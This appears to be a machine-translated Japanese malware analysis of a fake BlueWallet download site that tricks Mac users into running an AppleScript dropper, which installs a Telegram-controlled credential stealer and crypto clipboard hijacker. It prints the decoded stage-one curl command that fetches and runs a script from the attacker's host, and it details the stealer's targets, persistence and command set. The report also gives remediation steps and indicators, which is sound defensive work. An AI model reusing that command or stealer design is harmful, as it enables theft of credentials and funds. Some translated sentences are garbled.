「BlueWallet」(実在するビットコインウォレット)を装った偽サイトが、シンプルながらも効果的な手口でMac 標的にしています。BlueWallet自体にセキュリティ上の問題は発生していません。むしろ、サイバー犯罪者たちが正規のビットコインウォレットの名称やブランドを盗用し、悪意のあるダウンロードを信頼できるものに見せかけているのです。
仮想通貨ウォレットを探していて、こうした偽のBlueWalletダウンロードページにたどり着いた場合、そのサイトは、ダウンロードしたファイルをmacOSの標準ツールで開き、「実行」をクリックするよう誘導しようとします。もしその指示に従った場合、マルウェアによって保存されたパスワード、ブラウザのログイン情報、仮想通貨ウォレット、文書、その他の機密データが盗まれる可能性があります。また、このマルウェアはクリップボードを監視して仮想通貨ウォレットのアドレスを検知し、攻撃者が管理するアドレスに書き換えることも可能です。
この最後の機能は特に危険です。送金前にウォレットアドレスをコピーすると、マルウェアがそれを攻撃者のアドレスに気づかれないように置き換えてしまう可能性があります。画面上では何も変わっていないように見えますが、実際には資金は別の場所へ送金されてしまいます。
心配する必要はあるでしょうか? ファイルをダウンロードして実行した場合に限ります。単にページにアクセスして閉じただけでは、何も起こりません。この攻撃は、ユーザーがスクリプトを開いて「再生」ボタンを押すことに完全に依存しています。
もし実行してしまった場合は、そのマシンを感染したものと見なし、以下の手順に従ってください。
実行してしまった可能性がある場合の対処法
ファイルを開いて再生ボタンを押してしまった場合は、デバイスが不正アクセスを受けたものと見なし、以下の手順に従ってください:
- 制御チャネルを切断するには、本機をネットワークから切り離してください
- デバイスのフルスキャンを実行し、Web保護機能が有効になっている最新のセキュリティソフトウェアを使用していることを確認してください
- 別の信頼できるデバイスから、Macしているすべてのアカウントのパスワードを変更してください。まずはメールや仮想通貨取引所から始めましょう
- クリーンなデバイスで作成した新しいウォレットに、任意の仮想通貨を移動してください
- 既存のシードフレーズおよび鍵は、公開されているものとみなす
- 今後、暗号資産を送金する際は、宛先アドレスを1文字ずつ確認してください
- 以下の場所にある見覚えのないファイルを確認し、削除してください
~/Library/LaunchAgents - 隠されたものを探してください
.sysupd.shファイルの保存/tmp - 以下の場合は、CloudおよびSSHの認証情報をローテーションしてください
.ssh,.awsあるいは.gnupgそのマシンにはファイルが存在していた - 不安がある場合は、その場でクリーンインストールしようとするのではなく、データをバックアップしてから、正常に動作することが確認済みのソースからmacOSを再インストールしてください。
手を出してはいけないものを手に入れてしまった?
ソーシャルエンジニアリングの手口
この攻撃の最も興味深い点は、技術的な側面ではありません。Mac Appleのセキュリティ対策を回避したりしたわけではありません。彼らは被害者に、自らマルウェアを実行させるよう仕向けたのです。
この偽サイトは、説得力のあるダウンロードページや簡単な手順、さらにはキーボードショートカットまで用意して、ユーザーを誘導します。被害者が画面に表示されている内容を信じてしまうため、攻撃は成功してしまうのです。
オペレーティングシステムが悪意のあるソフトウェアをブロックする能力を高めるにつれ、攻撃者はソーシャルエンジニアリングへの投資をますます増やしています。セキュリティ対策を回避する方法を模索する代わりに、彼らは人々を説得して、その対策を無視してクリックさせるよう仕向けているのです。
だからこそ、ある習慣がますます重要になってきています。それは、スクリプトツールや開発者向けユーティリティ、あるいはターミナルウィンドウで開いて「実行」ボタンを押すよう指示されるようなダウンロードには、常に疑いの目を向けることです。
このキャンペーンでは、⌘Rキーを1回押すだけで、Mac パスワード窃取ツール、仮想通貨ウォレットの盗難ツール、クリップボード乗っ取りツール、そしてリモートアクセスツールMac 変貌してしまった。
テクニカル分析
第1段階:AppleScriptダウンローダー
このページは次のURLにあります update-bluewallet[.]com、実際のウォレットに十分近いドメイン名(bluewallet.io)を一瞥するだけでも。このページがまず行うのは、同意を待たないことです。そのスクリプトは、ページが読み込まれた瞬間に2秒間隔でダウンロードルーチンを呼び出し、訪問者が2つのボタンのいずれかをクリックした場合にも再度呼び出します。
「ダウンロード」フォルダに保存されるファイルの名前は BlueWallet Installer.applescript……これは、ほとんどの人が見たこともなく、疑うことさえ思いつかない拡張機能です。
すると、このページはさりげなく巧妙な仕掛けを仕掛けてくる。少し間を置いた後、ページは自身のステータステキストを書き換え、セットアップの手順のように表示するようになる。具体的には、「インストーラーを開き、再生ボタンまたは⌘Rを押してください」という内容だ。さらに、テキストの中に小さな青い再生三角マークを描画することで、被害者がこれから目にする実際のスクリプトエディタのインターフェースと文言が一致するようにしている。
このページでは、被害者がファイルを実行するために必要な手順を一つひとつ詳しく説明しています。
最新のmacOSでは、ウェブからダウンロードした署名のないアプリケーションは、実行される前に隔離され、検査されます。一方、スクリプトエディタで開いてユーザーが実行するプレーンスクリプトは、このプロセスを回避します。ユーザーが信頼できるApple製ツールに対して手動でコードの実行を指示しているため、ノータリゼーションによるチェックが失敗する心配はありません。
攻撃者がパッケージ化されたアプリではなくAppleScriptを選んだ理由はここにある。つまり、リスクを伴う操作をOSの管轄から外し、被害者自身に委ねるためだ。
このAppleScript自体は驚くほど短い。偽のバージョン番号や「Brew Install Upgrade」と称する行など、装飾的なコメントをすべて削除すると、単一のBase64エンコードされたシェルコマンドを実行し、その後Script Editorに保存せずに終了するよう指示して、痕跡を消し去る。
そのコマンドを解析すると、次のような動作をします:
curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &リモートホストから2つ目のスクリプトを取得し、それをtempディレクトリ内の隠しファイルに保存して実行権限を設定した後、すべての出力を抑制してバックグラウンドで実行します。
被害者は何も見ていない。ファイル名 .sysupd.sh システム更新のように見せかけています。これは典型的な段階的ドロッパーです。第1段階はごく小さく、使い捨てであり、その唯一の役割は本物のペイロードを取得することです。
第2段階:ペイロード解析
最初の数行で、このマルウェアがどのように動作するかが示されています。そこでは、 umask 077 そのため、生成されるすべてのファイルは侵害されたユーザーのみが読み取ることができ、その後、 /tmp 出典: /dev/urandom.
その構成は難読化されているが、その程度は弱い。という名前の小さな関数が _xd ヘックス文字列を2文字ずつ処理し、各バイトをハードコードされた繰り返しキーとXOR演算を行う: swckR9JCD2Uu.
この関数は、実行時にスクリプト内のTelegramボットトークン、チャット識別子、セカンダリコマンドトークン、およびステージングURLを復号します。これは、平文の文字列のみを検索するツールに対抗するには十分ですが、それ以上の効果はありません。鍵とアルゴリズムの両方がファイル内に格納されているため、エンコードされた値はすべて完全に復元可能だからです。
ある点が特に注目されます。それは、復号されたTelegramチャットのデータと、復号されたコマンド&コントロール(C&C)チャットのデータが同一であるということです。攻撃者は、データの流出先(エクソフィルトレーション・ドロップ)と制御チャネルの両方に、単一のTelegramチャンネルを利用しています。この手法はコストが低く、拡張性が高く、暗号化されており、通常のHTTPSトラフィックに紛れ込みやすいという特徴があります。
すべてが難読化されているわけではありません。クリップボードを乗っ取るためのアドレスが、ファイル内に平文で記載されています。具体的には、ビットコインアドレス、イーサリアムアドレス、そしてソラナアドレスです。これらは、ユーザーがウォレットアドレスをコピーしようとした際に、このマルウェアがすり替えるアドレスです。これらはそれぞれのブロックチェーン上で公開されているため、サンプル全体の中でも最も有用な証拠の一つとなっています。
マルウェアが盗むもの
第2段階の収集ルーチンは網羅的です。これらは6つの大分類からデータを抽出します。
1. ウェブブラウザ
このスクリプトは、以下を含む幅広いブラウザから、閲覧履歴、Cookie、ログイン情報、およびブックマークを抽出します:
- Chromiumベースのブラウザ:GoogleChrome 、Beta、Canary、Dev)、Brave、MicrosoftEdge、Vivaldi、Opera、Opera GX、Arc、Chromium、Coccoc、Yandex
- Firefoxをベースとしたブラウザ:Firefox、Waterfox、Pale Moon、Zen、LibreWolf
- macOSのネイティブブラウザデータ:SafariのCookie、閲覧履歴、およびフォームの入力値
2. 仮想通貨ウォレット
これがこの脚本の一番の焦点であるようだ。
対象となるのは、Electrum、Electrum-LTC、Exodus、Atomic Wallet、Ledger Live、Trezor Suite、BitcoinCore、LitecoinCore、DashCore、DogecoinCore、Coinomi、Monero、Sparrow、Armory、BlueWallet、Zengo、Trust Wallet、Binance Desktop、Tonkeeperなどのデスクトップウォレットアプリケーションです。
また、複数のエコシステムにまたがるブラウザ拡張機能型ウォレットも対象としています:
- ビットコイン:Xverse 、Leather、UniSat、Alby、およびWizz
- ソラナ:Phantom 、Solflare、Backpack、Nightly、MagicEden、Sollet、およびSlope
- EVMウォレット:MetaMask 、Trust Wallet、OKX、Coinbase Wallet、Rabby、Zerion、Rainbow、SafePal、Bitget、Ronin、XDEFI
- コスモス:ケプラー 、ステーション、コスモステーション
- その他のエコシステム:Yoroi 、Lace、Petra、Martian、Suiet、Talisman、SubWallet、Braavos、およびTemple
3. パスワード管理ツールとセキュリティツール
このマルウェアは、LastPass、1Password、Dashlane、Bitwarden、Keeper、RoboForm、NordPass、Enpass、StickyPassword、TrueKey、Passbolt、Buttercupなど、複数のパスワード管理ツールのローカルストレージや設定を標的としています。
また、Google Authenticator、Authy、Duo、Microsoft Authenticator、2FAS、FreeOTPなど、2段階認証(2FA)や認証アプリに関連するデータも検索します。
4. コミュニケーション・ソーシャルアプリ
このスクリプトは、Telegram DesktopおよびDiscord(Discord CanaryおよびDiscord PTBを含む)のセッションデータとローカルストレージをコピーしようとします。
5. 開発者向けおよびクラウドツール
ユーザーのホームディレクトリ内にある認証情報や設定ファイルを探します。具体的には以下のものが含まれます:
- AWS CLIの設定は
.aws - SSHキーのインポート
.ssh - GnuPGの鍵をインポート
.gnupg - Kubernetesの設定ファイルは
.kube - ShellおよびGitファイル(以下を含む)
.zshrc,.zsh_history,.bash_history、そして.gitconfig
6. 生産性向上アプリと一般的なファイル
このスクリプトは、ローカルのApple Notesデータベースをコピーし、 NoteStore.sqlite.
また、Honey、CapitalOne Shopping、Rakuten、CamelCamelCamel、Grammarly、Evernote、Notion Clipper、Todoist、Google Keepなど、ショッピングや生産性向上ツールに関連するブラウザ拡張機能のデータも検索対象となります。
最後に、デスクトップ、ドキュメント、ダウンロードフォルダ内をスキャンし、拡張子が以下のものを含むファイルを探します .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem、そして .env、サイズ制限の範囲内で。
盗んだデータをどう扱うのか
このマルウェアは、ユーザーのアカウントパスワードを直接盗み出そうとします。 osascript 「システム環境設定」というダイアログが表示され、ユーザーに「続行するには」パスワードの再入力が求められます。このスクリプトは、各入力試行を dscl . authonly 保存する前に、有効な認証情報が得られるまで停止しないようにします。
データ持ち出しを行う際、macOS独自の機能を使用して、段階的に処理されたデータをアーカイブします dittoおそらく、それは常に存在しているからでしょう。一方、 zipTelegramのアップロード上限である50MBを超えないようにするため、大きなアーカイブファイルを49MBずつに分割して split 各部品を発送する前に。
ユーザーの ~/Library/LaunchAgents、隠しサポートディレクトリをバックエンドとして使用し、それを読み込んで launchctl これにより、ログインするたびにインプラントが再実行されるようになります。
クリップボードハイジャックは、バックグラウンドで繰り返し再生される動画です。A clip_watch この関数はクリップボードを継続的に監視し、正規表現を用いてビットコイン、イーサリアム、ソラナのアドレス形式と照合し、元のアドレスをコマンド&コントロールチャネルに報告した上で、攻撃者のアドレスでクリップボードを上書きします。 pbcopy.
つまり、コピーとペーストの間に、目立たない形で置換が行われるということです。
最後に、このマルウェアは対話形式で制御することができます。A c2_loop Telegramボットにコマンドをポーリングし、オペレーター向けの包括的なツールキットをサポートしています:
/infoシステムの詳細については/exec任意のシェルコマンドに対して/clipboardクリップボードの現在の内容を読み取る/download特定のファイルを取得する/exfil盗難モジュールを再実行する/selfdestruct痕跡を消すために
これにより、Telegramチャンネルは単なる一方的な情報配信の場ではなく、リアルタイムのリモートコントロール機能を持つものとなります。
自然の恵みとTelegramで生計を立てている
ここに見られる傾向はよく知られたものであり、ますます一般的になりつつあります。それは、すでに信頼されているツールに頼ることです。
この配信手法は、Apple自身のScript Editorを悪用している。設定データは、圧縮されたバイナリではなく、単純なXOR暗号化によって隠蔽されている。コマンドチャネルにはTelegramのBot APIが利用されており、これにより、未知のサーバーを検知して警告を発するアウトバウンドフィルタをすり抜けることが可能となる。
これらの手法は、それ単体では目新しいものではありません。その有効性は、一見正当に見える要素を重ね合わせることで、どの段階も単独では警戒を引き起こさないようにしている点にあります。
検知の機会
ここでの教訓は、その魅力というよりも、むしろそのテクニックそのものにある。
1行のBase64を実行するスクリプトエディタ do shell script すぐに終了してしまうことは、強力な行動上のシグナルであり、使い捨てのステージ1ファイルよりもはるかに優れた検知対象となる。隠されたファイルも同様である /tmp/.sysupd.sh ダウンロードしたユーザー curl そしてバックグラウンドで起動されました。
ブラウザやダウンロード画面では、次のように扱うことができる .applescript ウェブから送信されてくるファイルについても、実行ファイルと同様に警戒すべきである。また、Telegramは依然として対策が不十分なコマンド&コントロール手段であり、ボットトークンの悪用に関する通報を行うことで、その根源を断つことができる。
侵害の兆候
ファイルハッシュ(SHA-256)
216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61(BlueWallet Installer.applescript)
ネットワーク指標
update-bluewallet[.]comprojects2026box[.]com
クリップボード乗っ取りの対策
- BTC:
bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e - ETH:
0x2B871703122064e45d77146a6D5203da3bD192FA - SOL:
8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v
脅威を報告するだけでなく、取り除く
サイバーセキュリティのリスクは、ヘッドラインを超えて広がるべきではありません。今すぐMalwarebytes ダウンロードして、デバイスに脅威を持ち込まないようにしましょう。
